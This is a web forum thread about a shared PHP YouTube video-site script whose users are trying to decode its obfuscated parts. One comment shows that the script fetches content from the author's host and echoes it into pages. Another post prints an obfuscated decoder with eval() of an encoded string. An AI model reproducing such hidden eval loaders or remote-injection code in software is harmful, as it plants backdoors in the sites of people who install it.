youtube api v3 script with videos site name tag

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    youtube api v3 script with videos site name tag

    demo- http://demo.videoget.in

    video tag- view-video.php edit $site=''videoget''

    auto detect server
    Attached Files

    #2
    I edited the $site=''videoget'' with my site address but the view page is not working

    Comment


      #3
      I edited but not working

      Comment


        #4
        can any one decode the encoded portions of view-video.php and options.php

        Comment


        • something else
          something else commented
          Editing a comment
          view-video.php
          Top:
          Code:
          $anilvedu=ngegrab('http://videoget.in/tube.php?'.$_GET['id'].''); $anilvedu=potong($anilvedu,'',''); $anilvedu=str_replace('(videoget.in)','('.$site.')',$anilvedu);
          Bottom:
          Code:
          if (preg_match('/fullrip.net/', $anilvedu)){ echo ''.$anilvedu.'';} ;

        #5
        how to decode this??

        if(!function_exists("agF1gTdKEBPd6CaJ")) { function agF1gTdKEBPd6CaJ($ekV4gb3DGH29YotI) { $fYZ2g87NjIGLnXVg=""; $rZJ3glaFcSAz0dZY=0; $qVh0gqGnK20A4iOB=strlen($ekV4gb3DGH29YotI); while($rZJ3glaFcSAz0dZY < $qVh0gqGnK20A4iOB) { if($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY] == ' ') { $fYZ2g87NjIGLnXVg.=" "; } else if($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY] == '!') { $fYZ2g87NjIGLnXVg.=chr((ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY+1])-ord('A'))*16+(ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY+2])-ord('a'))); $rZJ3glaFcSAz0dZY+=2; } else { $fYZ2g87NjIGLnXVg.=chr(ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY])+1); } $rZJ3glaFcSAz0dZY++; } return $fYZ2g87NjIGLnXVg; } }eval(agF1gTdKEBPd6CaJ('du`k!Ci`fE0fScJDAOc5B`I!Ci &gd !CbBhnpce]k_raf!CbBh%-dsjjpgn,lcr-%* !CbBd_lgjtcbs!Ci!Ciy cafm %%,!CbBd_lgjtcbs,%%9{ 9&((:'));

        Comment


        #6
        Originally posted by anildj View Post
        demo- http://demo.videoget.in

        video tag- view-video.php edit $site=''videoget''

        auto detect server
        please share your download files

        Comment

        Working...
        X